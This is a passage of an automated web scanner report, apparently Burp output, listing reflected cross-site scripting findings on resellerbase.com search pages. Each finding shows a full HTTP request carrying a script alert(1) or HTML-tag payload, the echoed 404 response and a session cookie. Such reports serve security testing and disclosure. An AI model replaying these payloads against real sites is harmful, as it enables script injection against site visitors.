Date: Wed, 17 Nov 2010 23:18:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images171ee<script>alert(1)</script>fe19e789393/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.976. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cab90<script>alert(1)</script>ea43b0e35b0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/search.phpcab90<script>alert(1)</script>ea43b0e35b0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.phpcab90<script>alert(1)</script>ea43b0e35b0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.977. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bb96b<a>3ae408f9245 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchbb96b<a>3ae408f9245&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchbb96b<a>3ae408f9245&opt=2 was not found on this server.</p>
...[SNIP]...

2.978. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7cfab<a>3197fc5a51c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...7cfab<a>3197fc5a51c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.php?keyword=search...7cfab<a>3197fc5a51c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.979. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d27b9<script>alert(1)</script>022ea273b9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&d27b9<script>alert(1)</script>022ea273b9f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&d27b9<script>alert(1)</script>022ea273b9f=1 was not found on this server.</p>
...[SNIP]...

2.980. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f895d<a>9ea485156fb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2f895d<a>9ea485156fb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2f895d<a>9ea485156fb was not found on this server.</p>
...[SNIP]...

2.981. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 59ffd<script>alert(1)</script>ffb69a2c1fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail59ffd<script>alert(1)</script>ffb69a2c1fe/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail59ffd<script>alert(1)</script>ffb69a2c1fe/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.982. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8041e<script>alert(1)</script>bc30af7bbdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/118041e<script>alert(1)</script>bc30af7bbdc/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/118041e<script>alert(1)</script>bc30af7bbdc/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.983. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 43c75<script>alert(1)</script>1ff157ea5e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes43c75<script>alert(1)</script>1ff157ea5e3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes43c75<script>alert(1)</script>1ff157ea5e3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.984. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70e97<script>alert(1)</script>8d4bb99e7c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos70e97<script>alert(1)</script>8d4bb99e7c6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos70e97<script>alert(1)</script>8d4bb99e7c6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.985. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f9a6e<script>alert(1)</script>04d1071b4d0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/search.phpf9a6e<script>alert(1)</script>04d1071b4d0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.phpf9a6e<script>alert(1)</script>04d1071b4d0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.986. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8cd95<a>ef33957b622 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search8cd95<a>ef33957b622&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search8cd95<a>ef33957b622&opt=2 was not found on this server.</p>
...[SNIP]...

2.987. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e99f1<a>23f60e2f74a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...e99f1<a>23f60e2f74a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.php?keyword=search...e99f1<a>23f60e2f74a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.988. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f54e9<script>alert(1)</script>0168923071f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&f54e9<script>alert(1)</script>0168923071f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&f54e9<script>alert(1)</script>0168923071f=1 was not found on this server.</p>
...[SNIP]...

2.989. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f2f25<a>33d05331e6c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2f2f25<a>33d05331e6c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2f2f25<a>33d05331e6c was not found on this server.</p>
...[SNIP]...

2.990. http://www.resellerbase.com/detail/11/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ed24<script>alert(1)</script>c7af74ff6cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9ed24<script>alert(1)</script>c7af74ff6cc/11/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9ed24<script>alert(1)</script>c7af74ff6cc/11/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.991. http://www.resellerbase.com/detail/11/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6bb3<script>alert(1)</script>6b2a949de1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11e6bb3<script>alert(1)</script>6b2a949de1e/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11e6bb3<script>alert(1)</script>6b2a949de1e/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.992. http://www.resellerbase.com/detail/11/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 217d6<script>alert(1)</script>5d290e7819d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes217d6<script>alert(1)</script>5d290e7819d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes217d6<script>alert(1)</script>5d290e7819d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.993. http://www.resellerbase.com/detail/11/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f3c3<script>alert(1)</script>c639e7c37b7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/search.php8f3c3<script>alert(1)</script>c639e7c37b7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
